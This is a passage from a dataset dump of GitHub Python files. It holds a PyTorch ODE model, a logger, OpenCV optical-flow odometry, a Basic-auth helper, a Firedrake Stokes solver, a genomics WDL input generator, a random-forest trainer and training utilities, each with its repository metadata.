__init__(\n self,\n data: Data,\n device: torch.device,\n *,\n func_dim: int,\n fc_dims: List[int],\n ) -> None:\n super().__init__()\n\n self.data = data\n self.device = device\n\n input_dim = (\n func_dim\n + self.data.weather_at_time(torch.Tensor([0]).to(self.device)).shape[1]\n )\n self.fcs = torch.nn.ModuleList(\n (\n [torch.nn.Linear(input_dim, fc_dims[0])]\n + [\n torch.nn.Linear(input_dim, output_dim)\n for input_dim, output_dim in pairwise(fc_dims)\n ]\n + [torch.nn.Linear(fc_dims[-1], func_dim)]\n )\n if fc_dims\n else [torch.nn.Linear(input_dim, func_dim)]\n )\n\n for module in self.fcs.modules():\n if isinstance(module, torch.nn.Linear):\n torch.nn.init.normal_(module.weight, mean=0, std=0.1)\n torch.nn.init.constant_(module.bias, val=0)\n\n def forward(self, t: torch.Tensor, x: torch.Tensor) -> torch.Tensor:\n if t.dim() == 0:\n t = t.unsqueeze(0)\n if x.dim() == 0:\n x = x.unsqueeze(0)\n\n t = t + self.start_time\n weather = self.data.weather_at_time(t)\n x = torch.cat([weather, x], dim=-1).to(self.device)\n\n for fc in self.fcs[:-1]:\n x = fc(x)\n x = torch.tanh(x)\n x = self.fcs[-1](x)\n return x\n","repo_name":"UofTrees/ProjectX2020","sub_path":"mr_node/model/odefunc.py","file_name":"odefunc.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"21227932148","text":"\"\"\"\nModule for the logging system of saving processes.\n\"\"\"\n\nimport os\nfrom datetime import date, datetime\nimport logging\nimport json\nimport os\n\n\n# Make global variables at import time\ncurrent_date = date.today().strftime(\"%d-%m-%Y\")\ncurrent_time = datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")\nsave_folder = \"logs\"\nlog_filename = os.path.join(save_folder, current_time + \".log\")\n\n\ndef logger_setup(\n save_folder_path: str,\n filename: str = None,\n filemode: str = 'a',\n format: str = '%(asctime)s - %(message)s',\n level: int = logging.INFO,\n datefmt: str = '%d-%m-%y %H:%M:%S'\n):\n \"\"\"\n Setup for logging. This function should be called from the main thread before other threads are started.\n\n After setting the base directory, logger will will create a folder for every date called,\n and files will be saved in that folder with names of the current time.\n\n Args:\n save_folder_path: Base folder path of where to save the logging files to.\n Arguments passed to the logging.basicConfig:\n filename: Defaults to current time in the format d-m-y_H-M-S.\n filemode: Defaults to 'a'.\n format: Defaults to '%(asctime)s - %(message)s'.\n level: Defaults to logging.INFO.\n datefmt: Defaults to '%d-%m-%y %H:%M:%S'.\n \"\"\"\n\n current_date = date.today().strftime(\"%d-%m-%Y\")\n current_time = datetime.now().strftime(\"%d-%m-%Y_%H-%M-%S\")\n\n save_folder = os.path.join(save_folder_path, current_date)\n if not os.path.isdir(save_folder):\n os.mkdir(save_folder) # Create directory\n\n log_filename = os.path.join(save_folder, current_time + \".log\")\n if not filename:\n filename = log_filename\n logging.basicConfig(\n filename=filename,\n filemode=filemode,\n format=format,\n level=level,\n datefmt=datefmt)\n\n\nclass Logger:\n \"\"\"\n Class for logging info into the .log file based on settings passed by the logger setup.\n Methods also print to the standard output.\n \"\"\"\n current_save_folder_path = save_folder\n\n @staticmethod\n def log(log_entry: str, out_print: bool = True, indent: int = 0) -> None:\n \"\"\"\n logging function for saving logs to the log file and printing to console.\n\n Args:\n log_entry: String to be logged and printed(if set)\n out_print: If log should be printed to the console. Defaults to True.\n indent: How many indents(4 spaces) should be put in front of the string to output.\n \"\"\"\n logging.info(log_entry)\n if out_print:\n if indent == 0:\n print(log_entry)\n else:\n print((indent * 4) * \" \" + log_entry)\n\n @staticmethod\n def log_dict(log_entry: dict, entry_name: str = \"Dictionary\") -> None:\n \"\"\"\n logging function for saving logs of dictionaries to the log file and pretty printing to standard output.\n\n Args:\n log_entry: Dictionary to be pretty printed.\n entry_name: Name of dictionary.\n \"\"\"\n logging.info(log_entry)\n print(entry_name, end=\": \")\n print(json.dumps(log_entry, indent=4, sort_keys=False))\n","repo_name":"Bonaventure123/Repo3","sub_path":"venv/Lib/site-packages/_selenium_webdriver_extender/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1440875813","text":"import cv2\nimport numpy as np\nimport time\nfrom eulerAngles import EulerAngles\nimport math\n\nlk_params = dict(winSize=(15, 15), maxLevel=2, criteria=(cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\ncamera_matrix = np.array([[477.70629631, 0., 305.66414982],\n [ 0., 477.83388597, 183.12365019],\n [ 0., 0., 1. ]])\n\nf = 2.123139094711111\npp = (1.3585073325333332, 0.34335684410625)\nindex_params = dict(algorithm=6, trees=4)\nsearch_params = dict(checks=20) # or pass empty dictionary\n\n\n\n\ncap = cv2.VideoCapture(0)\nfast = cv2.FastFeatureDetector.create(threshold=25, nonmaxSuppression=True)\n_, prev_frame = cap.read()\nprev_frame = cv2.resize(prev_frame, (240, 135))\nprev_frame = cv2.GaussianBlur(prev_frame, (3, 3), 5)\nprev_frame = cv2.cvtColor(prev_frame, cv2.COLOR_BGR2GRAY)\nold_points = fast.detect(prev_frame)\nold_points = np.array([x.pt for x in old_points], dtype=np.float32)\nt_global = np.zeros((3, 1))\nR_global = np.array([[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1]])\nidentity = np.array([[1, 0, 0],\n [0, 1, 0],\n [0, 0, 1]])\nR_global_euler = EulerAngles((0, 0, 0))\nwhile True:\n startTime = time.time_ns()\n _, frame = cap.read()\n frame = cv2.resize(frame, (240, 135))\n frame = cv2.GaussianBlur(frame, (3, 3), 5)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY, frame)\n current_frame = frame.copy()\n if old_points.shape[0] < 2000:\n old_points = fast.detect(prev_frame)\n old_points = np.array([x.pt for x in old_points], dtype=np.float32)\n new_points, st, err = cv2.calcOpticalFlowPyrLK(prev_frame, current_frame, old_points, None, **lk_params)\n st = st.reshape(st.shape[0])\n old_points = old_points[st == 1]\n new_points = new_points[st == 1]\n #E, _ = cv2.findEssentialMat(new_points, old_points, focal=1, pp=(0, 0), method=cv2.RANSAC, prob=0.999, threshold=1.0)\n E, _ = cv2.findEssentialMat(old_points, new_points, cameraMatrix=camera_matrix, method=cv2.RANSAC, prob=0.9, threshold=1.0)\n print(type(E))\n R1, R2, t = cv2.decomposeEssentialMat(E)\n R1_euler = EulerAngles(R1)\n R2_euler = EulerAngles(R2)\n if abs(abs(R1_euler.pitch) + abs(R1_euler.yaw)) > abs(abs(R2_euler.pitch) + abs(R2_euler.yaw)):\n R = R2\n else:\n R = R1\n\n t_global = t_global + R.dot(t)\n R_global = R.dot(R_global)\n R_euler = EulerAngles(R)\n R_global_euler = EulerAngles(R_global)\n cv2.imshow(\"Frame\", prev_frame)\n prev_frame = current_frame.copy()\n old_points = new_points.copy()\n key = cv2.waitKey(1)\n if key == 27:\n break\n endTime = str(1/((time.time_ns() - startTime)/1000000000))\n #print(str(t) + \" \" + str(endTime))\n #print(\"R1: \\n\" + str(R1_euler) + \"\\nR2: \\n\" + str(R2_euler) + \"\\nR: \\n\" + str(R_euler) + \"\\nGlobal: \\n\" + str(R_global_euler) + \"\\nTime: \" + endTime + \"\\n\")\n\n\n\n","repo_name":"AbhinavPeri/9-10th-Grade-Summer-OpenCV-Experiments","sub_path":"Optical Flow.py","file_name":"Optical Flow.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"744803349","text":"# pylint: disable=invalid-name,no-value-for-parameter\n''' Helper methods to handle authentication '''\n\nimport base64\nimport daedalus.config\nimport daedalus.exceptions\n\nfrom urlparse import urlparse\n\nfrom daedalus.common.auth.models import Caller\nfrom daedalus.common.db import DBSession\nfrom daedalus.config import ALLOWED_DOMAINS\n\ndef _parse_auth_string(auth_string):\n '''Pulls username and token out of the auth string.'''\n try:\n auth_type, data = auth_string.split(' ', 1)\n assert auth_type == 'Basic'\n return base64.b64decode(data).split(':', 1)\n except (AssertionError, TypeError, AttributeError, ValueError):\n raise daedalus.exceptions.InvalidAuthorizationHeader('Header is invalid: %r' % auth_string)\n\ndef _check_caller(username, token, callback_url):\n '''Checks the `username` and `token` match and `callback_url` is allowed.'''\n try:\n assert token == get_token(username)\n if callback_url:\n assert callback_url in ALLOWED_DOMAINS\n return True\n except AssertionError:\n return False\n except daedalus.exceptions.UnknownUsername:\n return False\n\ndef check_auth(auth_string, callback_url=None):\n '''Parses auth string and checks to make sure username and token match.'''\n if not auth_string:\n return False\n\n try:\n username, token = _parse_auth_string(auth_string)\n except daedalus.exceptions.InvalidAuthorizationHeader:\n return False\n\n if callback_url:\n netloc = urlparse(callback_url).netloc\n if netloc == '':\n return False\n callback_url = netloc\n\n return _check_caller(username, token, callback_url)\n\ndef get_username(auth_string):\n '''Gets the username from the auth_string.'''\n username, _ = _parse_auth_string(auth_string)\n return username\n\n@DBSession()\ndef get_token(username, _db_session):\n '''Gets the token for a given user from the auth dict.'''\n caller = _db_session.query(Caller).filter_by(username=username).first()\n if caller is None:\n raise daedalus.exceptions.UnknownUsername('No token for username: %r' % username)\n return caller.token\n","repo_name":"Millz0r/daedalus","sub_path":"daedalus/common/auth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3240975523","text":"from firedrake import *\nfrom alfi.transfer import *\nfrom firedrake.mg.utils import get_level\n\nfrom functools import reduce\n\nimport argparse\nimport numpy as np\nfrom petsc4py import PETSc\n\nparser = argparse.ArgumentParser(add_help=False)\nparser.add_argument(\"--nref\", type=int, default=1)\nparser.add_argument(\"--k\", type=int, default=2)\nparser.add_argument(\"--solver-type\", type=str, default=\"almg\")\nparser.add_argument(\"--gamma\", type=float, default=1e4)\nparser.add_argument(\"--dr\", type=float, default=1e8)\nparser.add_argument(\"--N\", type=int, default=10)\nparser.add_argument(\"--itref\", type=int, default=0)\nparser.add_argument(\"--nonzero-initial-guess\", dest=\"nonzero_initial_guess\", default=False, action=\"store_true\")\nparser.add_argument(\"--discretisation\", type=str, default=\"hdiv\")\nparser.add_argument(\"--mattype\", type=str, default=\"aij\")\nparser.add_argument(\"--galerkin\", dest=\"galerkin\", default=False, action =\"store_true\")\nargs, _ = parser.parse_known_args()\n\n\nnref = args.nref\ndr = args.dr\nk = args.k\nN = args.N\ngamma = Constant(args.gamma)\n\ndistp = {\"partition\": True, \"overlap_type\": (DistributedMeshOverlapType.VERTEX, 1)}\n\nhierarchy = \"uniform\"\ndef before(dm, i):\n for p in range(*dm.getHeightStratum(1)):\n dm.setLabelValue(\"prolongation\", p, i+1)\n\ndef after(dm, i):\n for p in range(*dm.getHeightStratum(1)):\n dm.setLabelValue(\"prolongation\", p, i+2)\n\ndef mesh_hierarchy(hierarchy, nref, callbacks, distribution_parameters):\n baseMesh = RectangleMesh(N, N, 4, 4, distribution_parameters=distp)\n if hierarchy == \"uniform\":\n mh = MeshHierarchy(baseMesh, nref, reorder=True, callbacks=callbacks,\n distribution_parameters=distribution_parameters)\n else:\n raise NotImplementedError(\"Only know uniform for the hierarchy.\")\n return mh\nmh = mesh_hierarchy(hierarchy, nref, (before, after), distp)\n\nmesh = mh[-1]\n\nif args.discretisation == \"hdiv\":\n V = FunctionSpace(mesh, \"BDM\", k)\n Q = FunctionSpace(mesh, \"DG\", k-1)\nelif args.discretisation == \"cg\":\n V = VectorFunctionSpace(mesh, \"CG\", k)\n Q = FunctionSpace(mesh, \"DG\", 0)\nelse:\n raise ValueError(\"please specify hdiv or cg for --discretisation\")\n\nZ = V * Q\n\nPETSc.Sys.Print(\"dim(V) = \", V.dim())\nPETSc.Sys.Print(\"dim(Q) = \", Q.dim())\n\nsol = Function(V)\nu = TrialFunction(V)\nv = TestFunction(V)\np = TrialFunction(Q)\nq = TestFunction(Q)\n\nbcs = [DirichletBC(V, Constant((0., 0.)), \"on_boundary\")]\n\nomega = 0.1 #0.4, 0.1\ndelta = 100 #10, 200\nmu_min = Constant(dr**-0.5)\nmu_max = Constant(dr**0.5)\n\ndef Max(a, b): return (a+b+abs(a-b))/Constant(2)\n\ndef chi_n(mesh):\n X = SpatialCoordinate(mesh)\n def indi(ci):\n return 1-exp(-delta * Max(0, sqrt(inner(ci-X, ci-X))-omega/2)**2)\n # indis = [indi(Constant((4*(cx+1)/3, 4*(cy+1)/3))) for cx in range(2) for cy in range(2)]\n indis = []\n np.random.seed(1)\n for i in range(8):\n cx = 2+np.random.uniform(-1,1)\n cy = 2+np.random.uniform(-1,1)\n indis.append(indi(Constant((cx,cy))))\n return reduce(lambda x, y : x*y, indis, Constant(1.0))\n\ndef mu_expr(mesh):\n return (mu_max-mu_min)*(1-chi_n(mesh)) + mu_min\n\ndef mu(mesh):\n Qm = FunctionSpace(mesh, Q.ufl_element())\n return Function(Qm).interpolate(mu_expr(mesh))\n\n#File(\"mu.pvd\").write(mu(mesh))\n\nsigma = Constant(100.)\nh = CellDiameter(mesh)\nn = FacetNormal(mesh)\n\ndef diffusion(u, v, mu):\n if args.discretisation == \"cg\":\n return (mu*inner(2*sym(grad(u)), grad(v)))*dx\n else:\n return (mu*inner(2*sym(grad(u)), grad(v)))*dx \\\n - mu * inner(avg(2*sym(grad(u))), 2*avg(outer(v, n))) * dS \\\n - mu * inner(avg(2*sym(grad(v))), 2*avg(outer(u, n))) * dS \\\n + mu * sigma/avg(h) * inner(2*avg(outer(u,n)),2*avg(outer(v,n))) * dS\n\ndef nitsche(u, v, mu, bid, g):\n if args.discretisation == \"cg\":\n return 0\n else:\n my_ds = ds if bid == \"on_boundary\" else ds(bid)\n return -inner(outer(v,n),2*mu*sym(grad(u)))*my_ds \\\n -inner(outer(u-g,n),2*mu*sym(grad(v)))*my_ds \\\n +mu*(sigma/h)*inner(v,u-g)*my_ds\n\nF = diffusion(u, v, mu_expr(mesh))\nfor bc in bcs:\n if \"DG\" in str(bc._function_space):\n continue\n g = bc.function_arg\n bid = bc.sub_domain\n F += nitsche(u, v, mu_expr(mesh), bid, g)\n\nF += -10 * (chi_n(mesh)-1)*v[1] * dx\n\nif args.discretisation == \"hdiv\":\n Fgamma = F + gamma*inner(div(u), div(v))*dx(degree=2*(k-1))\nelif args.discretisation == \"cg\":\n Fgamma = F + gamma*inner(cell_avg(div(u)), cell_avg(div(v)))*dx(degree=2*(k-1))\nelse:\n raise ValueError(\"please specify hdiv or cg for --discretisation\")\n\na = lhs(Fgamma)\nl = rhs(Fgamma)\n\n\ncommon = {\n \"snes_type\": \"ksponly\",\n \"mat_type\": args.mattype,\n \"pmat_type\": args.mattype,\n \"ksp_type\": \"fgmres\",\n \"ksp_gmres_restart \": 300,\n \"ksp_norm_type\": \"unpreconditioned\",\n \"ksp_rtol\": 1.0e-6,\n \"ksp_atol\": 1.0e-10,\n \"ksp_max_it\": 500,\n \"ksp_converged_reason\": None,\n \"ksp_monitor_true_residual\": None,\n}\n\nsolver_lu = {\n \"pc_type\": \"lu\",\n \"pc_factor_mat_solver_type\": \"superlu_dist\",\n}\n\nsolver_hypre = {\n \"pc_type\": \"hypre\",\n}\n\nmg_levels_solver = {\n \"ksp_type\": \"fgmres\",\n \"ksp_norm_type\": \"unpreconditioned\",\n \"ksp_max_it\": 5,\n \"pc_type\": \"python\",\n \"pc_python_type\": \"matpatch.MatPatch\",\n}\n\n#mg_levels_solver = {\n# \"ksp_type\": \"fgmres\",\n# \"ksp_norm_type\": \"unpreconditioned\",\n# \"ksp_max_it\": 5,\n# \"pc_type\": \"jacobi\",\n#}\n\nsolver_mg = {\n \"pc_type\": \"mg\",\n \"pc_mg_type\": \"full\",\n \"mg_levels\": mg_levels_solver,\n \"mg_coarse_pc_type\": \"python\",\n \"mg_coarse_pc_python_type\": \"firedrake.AssembledPC\",\n \"mg_coarse_assembled_pc_type\": \"lu\",\n \"mg_coarse_assembled_pc_factor_mat_solver_type\": \"superlu_dist\",\n}\n\nif args.solver_type == \"almg\":\n params = {**common, **solver_mg}\nelif args.solver_type == \"allu\":\n params = {**common, **solver_lu}\nelif args.solver_type == \"alamg\":\n params = {**common, **solver_hypre}\nelse:\n raise ValueError(\"please specify almg, allu or alamg for --solver-type\")\n\nif args.nonzero_initial_guess:\n sol.project(Constant((1., 1.)))\n\n\ndef get_prolong():\n if args.discretisation == \"cg\":\n V = Z.sub(0)\n Q = Z.sub(1)\n tdim = mesh.topological_dimension()\n vtransfer = PkP0SchoeberlTransfer((mu, gamma), tdim, hierarchy)\n return vtransfer.prolong\n else:\n return prolong\n\ndef get_transfers():\n V = Z.sub(0)\n Q = Z.sub(1)\n tdim = mesh.topological_dimension()\n vtransfer = PkP0SchoeberlTransfer((mu, gamma), tdim, hierarchy)\n transfers = {V.ufl_element(): (vtransfer.prolong, vtransfer.restrict, inject)}\n return transfers\n\ndef build_prolongation_matrix(prolong, V_coarse, V_fine):\n ''' From coarse to fine '''\n uc = Function(V_coarse)\n uf = Function(V_fine)\n\n ProOp = PETSc.Mat()\n ProOp.create(PETSc.COMM_WORLD)\n ProOp.setSizes([V_fine.dim(), V_coarse.dim()])\n ProOp.setType(args.mattype)\n ProOp.setUp()\n \n\n for icol in range(V_coarse.dim()):\n uc.dat.zero()\n if args.discretisation == \"cg\":\n uc.dat.data[int(icol/2)][icol%2] = 1.0\n else:\n uc.dat.data[icol] = 1.0\n arr = uc.vector().get_local()\n prolong(uc, uf)\n values = uf.vector().get_local()\n rows = np.where(np.absolute(values) > 1e-14)[0].astype(np.int32)\n values = values[rows]\n ProOp.setValues(rows, [icol], values)\n\n ProOp.assemblyBegin()\n ProOp.assemblyEnd()\n\n ## Save the prolongation matrix\n #viewer = PETSc.Viewer().createBinary(\"ProOp_\"+str(int(V_coarse.dim()))+\\\n # \"_dr\"+str(int(dr))+\\\n # \"_r\"+str(int(args.gamma))+\\\n # \".dat\",\\\n # PETSc.Viewer.Mode.WRITE)\n #viewer.pushFormat(viewer.Format.NATIVE)\n #viewer.view(ProOp)\n\n return ProOp\n\n# Build level operators\nif args.galerkin:\n levelOps = []\n M = assemble(a, bcs=bcs, mat_type=args.mattype)\n Afine = M.petscmat\n levelOps.append(Afine)\n level = nref\n Vf = V\n while level > 0:\n print(\"building level : \", level)\n Vc = FunctionSpace(mh[level-1], V.ufl_element())\n prolong = get_prolong()\n ProOp = build_prolongation_matrix(prolong, Vc, Vf)\n Acoarse = Afine.PtAP(ProOp)\n #bclevel = DirichletBC(Vc, Constant((0., 0.)), \"on_boundary\")\n #bc_idx = bclevel.nodes\n #nodes = []\n #for i in bc_idx:\n # nodes.append(2*i)\n # nodes.append(2*i+1)\n #Acoarse.zeroRowsColumns(nodes,diag=1)\n \n levelOps.append(Acoarse)\n Afine = Acoarse\n Vf = Vc\n level = level-1\n\ndef aug_jacobian(X, J, ctx):\n mh, level = get_level(ctx._x.ufl_domain())\n if args.galerkin:\n rmap, cmap = J.getLGMap()\n levelOps[nref-level].copy(J,structure=J.Structure.DIFFERENT_NONZERO_PATTERN)\n J.setLGMap(rmap, cmap)\n #viewer = PETSc.Viewer().createASCII(\"LevelOp_\"+str(int(level))+\\\n # \"_galerkin_J.dat\",\\\n # PETSc.Viewer.Mode.WRITE)\n #viewer.view(J)\n #else:\n #viewer = PETSc.Viewer().createASCII(\"LevelOp_\"+str(int(level))+\\\n # \".dat\",\\\n # PETSc.Viewer.Mode.WRITE)\n #viewer.view(J)\n\nfor i in range(args.itref+1):\n problem = LinearVariationalProblem(a, l, sol, bcs=bcs)\n solver = LinearVariationalSolver(problem,\n solver_parameters=params,\n post_jacobian_callback=aug_jacobian)\n\n if args.solver_type == \"almg\" and args.discretisation == \"cg\":\n transfermanager = TransferManager(native_transfers=get_transfers())\n solver.set_transfer_manager(transfermanager)\n\n solver.solve()\n with assemble(action(Fgamma, sol), bcs=homogenize(bcs)).dat.vec_ro as v:\n PETSc.Sys.Print('Relative residual with grad-div', v.norm()/norm(sol))\n\n# Write out solution\n#File(\"u.pvd\").write(sol)\n","repo_name":"MelodyShih/vvstokes-al","sub_path":"__history__/galerkin_vs_rediscretization.py","file_name":"galerkin_vs_rediscretization.py","file_ext":"py","file_size_in_byte":10159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27274769636","text":"import json\nimport pandas as pd\nimport os\nimport argparse\nfrom collections import defaultdict\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-json', required=True)\n parser.add_argument('-tab', required=True)\n parser.add_argument('-melt', action=\"store_true\")\n parser.add_argument('-bincov', action=\"store_true\")\n parser.add_argument('-delly', action=\"store_true\")\n parser.add_argument('-manta', action=\"store_true\")\n parser.add_argument('-process', action=\"store_true\")\n parser.add_argument('-PESR', action=\"store_true\")\n parser.add_argument('-baf', action=\"store_true\")\n parser.add_argument('-depth', action=\"store_true\")\n parser.add_argument('-cluster', action=\"store_true\")\n parser.add_argument('-contig', default='/cluster/home/qinqian/yangfan/phaseC_SV/input/hg38_contig_list.txt')\n args = parser.parse_args()\n \n if args.bincov:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['bincov.contigList'] = args.contig\n wdl_json['bincov.mask'] = '/cluster/home/qinqian/yangfan/phaseC_SV/software/WGD/refs/WGD_scoring_mask.rawCov.100bp.hg38.bed'\n wdl_json['bincov.inputSamplesFile'] = args.tab\n #wdl_json['bincov.outDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/cnmops/s394g01018_2'\n #wdl_json['bincov.outDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/cnmops/s394g01018_2_test'\n wdl_json['bincov.outDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/cnmops/dragon'\n os.system('mkdir -p %s' % wdl_json['bincov.outDir'])\n\n if args.manta:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['manta.inputSamplesFile'] = args.tab\n wdl_json['manta.refFasta'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta'\n wdl_json['manta.refFastafai'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai'\n wdl_json['manta.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/manta/DD_negative'\n os.system('mkdir -p %s' % wdl_json['manta.outputDir'])\n\n if args.delly:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['delly.inputSamplesFile'] = args.tab\n wdl_json['delly.refFasta'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta'\n wdl_json['delly.refFastafai'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai'\n wdl_json['delly.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/delly/DD_negative'\n os.system('mkdir -p %s' % wdl_json['delly.outputDir'])\n\n if args.melt:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['melt.inputSamplesFile'] = args.tab\n wdl_json['melt.refFasta'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta'\n wdl_json['melt.refFastafai'] = '/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai'\n wdl_json['melt.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/melt/DD_negative'\n os.system('mkdir -p %s' % wdl_json['melt.outputDir'])\n wdl_json['melt.MELT'] = '/cluster/home/qinqian/yangfan/phaseC_SV/software/MELTv2.0.5_patch/'\n\n if args.depth:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['collectDepth.inputSamplesFile'] = args.tab\n wdl_json['collectDepth.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/melt/DD_negative/'\n os.system('mkdir -p %s' % wdl_json['collectDepth.outputDir'])\n\n if args.baf:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['vcf2baf.inputSamplesFile'] = args.tab\n #wdl_json['vcf2baf.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/evidence/DD_negative'\n wdl_json['vcf2baf.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/evidence/dragon'\n os.system('mkdir -p %s' % wdl_json['vcf2baf.outputDir'])\n\n if args.PESR:\n with open(args.json) as j:\n wdl_json = json.load(j)\n wdl_json['collectPESR.inputSamplesFile'] = args.tab\n wdl_json['collectPESR.outputDir'] = '/cluster/home/qinqian/yangfan/phaseC_SV/dump/evidence/DD_negative'\n os.system('mkdir -p %s' % wdl_json['collectPESR.outputDir'])\n\n if args.process:\n wdl_json = {\n \"preprocess_pesr.min_svsize\": 50,\n \"preprocess_pesr.delly_vcf\": \"/cluster/home/qinqian/yangfan/phaseC_SV/dump/delly/s394g01018_test/R18055980LD01/R18055980LD01.delly.vcf\",\n \"preprocess_pesr.melt_vcf\": \"/cluster/home/qinqian/yangfan/phaseC_SV/dump/melt/s394g01018/R18055980LD01/melt.vcf\",\n \"preprocess_pesr.contigs\": \"/cluster/apps/refseq/GATK/hg38/Homo_sapiens_assembly38.fasta.fai\",\n \"preprocess_pesr.sample\": \"R18055980LD01\",\n \"preprocess_pesr.manta_vcf\": \"/cluster/home/data_share/seq-data/raw-data/DRAGEN_SV/R18055981LD01/results/variants/candidateSV.vcf.gz\" ## must be uncompressed\n }\n\n if args.cluster:\n wdl_json = {\n \"cluster_pesr_algorithm.svtypes\": \"BND\",\n #\"cluster_pesr_algorithm.flags\": \"--call-null-sites --include-reference-sites\",\n \"cluster_pesr_algorithm.flags\": \" \",\n \"cluster_pesr_algorithm.svsize\": \"30\",\n \"cluster_pesr_algorithm.frac\": \"0.1\",\n #\"cluster_pesr_algorithm.blacklist\": \"/cluster/home/qinqian/yangfan/phaseC_SV/software/WGD/refs/WGD_scoring_mask.rawCov.100bp.hg38.bed\",\n \"cluster_pesr_algorithm.dist\": \"500\",\n \"cluster_pesr_algorithm.algorithm\": \"manta\",\n \"cluster_pesr_algorithm.contigs\": args.contig,\n \"cluster_pesr_algorithm.vcfs\": [s.strip() for s in open(args.tab).readlines()],\n \"cluster_pesr_algorithm.batch\": \"s394g01018\"\n }\n with open(args.json+'.filled', 'w') as out:\n json.dump(wdl_json, out)\n","repo_name":"qinqian/svwdltest","sub_path":"scripts/render_json_inputs.py","file_name":"render_json_inputs.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18176293871","text":"from preprocess.train_processor import TrainProcessor\nfrom trainers.random_forest_trainer import RandomForestTrainer\n\nx_columns = [\"mean_handAcclX\", \"mean_handAcclY\", \"mean_handAcclZ\",\n \"mean_legAcclX\", \"mean_legAcclY\", \"mean_legAcclZ\",\n \"mean_BodyX\", \"mean_BodyY\", \"mean_BodyZ\",\n \"mean_legGyroX\", \"mean_legGyroY\", \"mean_legGyroZ\",\n \"mean_handGyroX\", \"mean_handGyroY\", \"mean_handGyroZ\"]\ny_column = \"label\"\nprocessor = TrainProcessor(x_columns, y_column)\n\nall_paths = [\"chicken.csv\", \"cowboy.csv\", \"logout.csv\", \"mermaid.csv\", \"numbersix.csv\", \"number7.csv\", \"salute.csv\",\n \"sidestep.csv\", \"swing.csv\", \"stationary.csv\", \"turnclap.csv\", \"wipers.csv\"]\nx_train, x_test, y_train, y_test = processor.prepare_train_all(\"data/extract\", all_paths)\n\ntrainer = RandomForestTrainer(14)\ntrainer.train(x_train, y_train)\ntrainer.evaluate(x_test, y_test)\ntrainer.save(\"models/random_forest.pkl\")\n","repo_name":"yunpengn/CG3002","sub_path":"software/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38852190698","text":"import os\nimport random\n\nimport numpy as np\nimport torch\n\n\ndef seed_everything(seed):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = True\n\ndef box_cxcywh_to_xyxy(x):\n x_c, y_c, w, h = x.unbind(-1)\n b = [(x_c - 0.5 * w), (y_c - 0.5 * h),\n (x_c + 0.5 * w), (y_c + 0.5 * h)]\n return torch.stack(b, dim=-1)\n\n\ndef collate_fn(batch_data):\n # Batch data is a list of n tuple, where tuple[0] is the img while tuple[1] are targets (labels, bounding boxes ecc)\n # Batch data is transformed in a list where list[0] contains a list of the images and list[1] contains a list of targets\n batch_data = list(zip(*batch_data))\n\n def _max_by_axis(the_list):\n # type: (List[List[int]]) -> List[int]\n maxes = the_list[0]\n for sublist in the_list[1:]:\n for index, item in enumerate(sublist):\n maxes[index] = max(maxes[index], item)\n return maxes\n\n sizes = [list(img.shape) for img in batch_data[0]]\n\n max_sizes = _max_by_axis(sizes)\n\n # Replace batch_data[0] with a tensor containing all batch images\n\n final_size = [len(batch_data[0])] + max_sizes\n b, c, h, w = final_size\n device = batch_data[0][0].device\n dtype = batch_data[0][0].dtype\n\n tensor = torch.zeros(final_size, dtype=dtype, device=device)\n\n for img, pad_img in zip(batch_data[0], tensor):\n pad_img[: img.shape[0], : img.shape[1], : img.shape[2]].copy_(img)\n\n batch_data[0] = tensor\n\n return 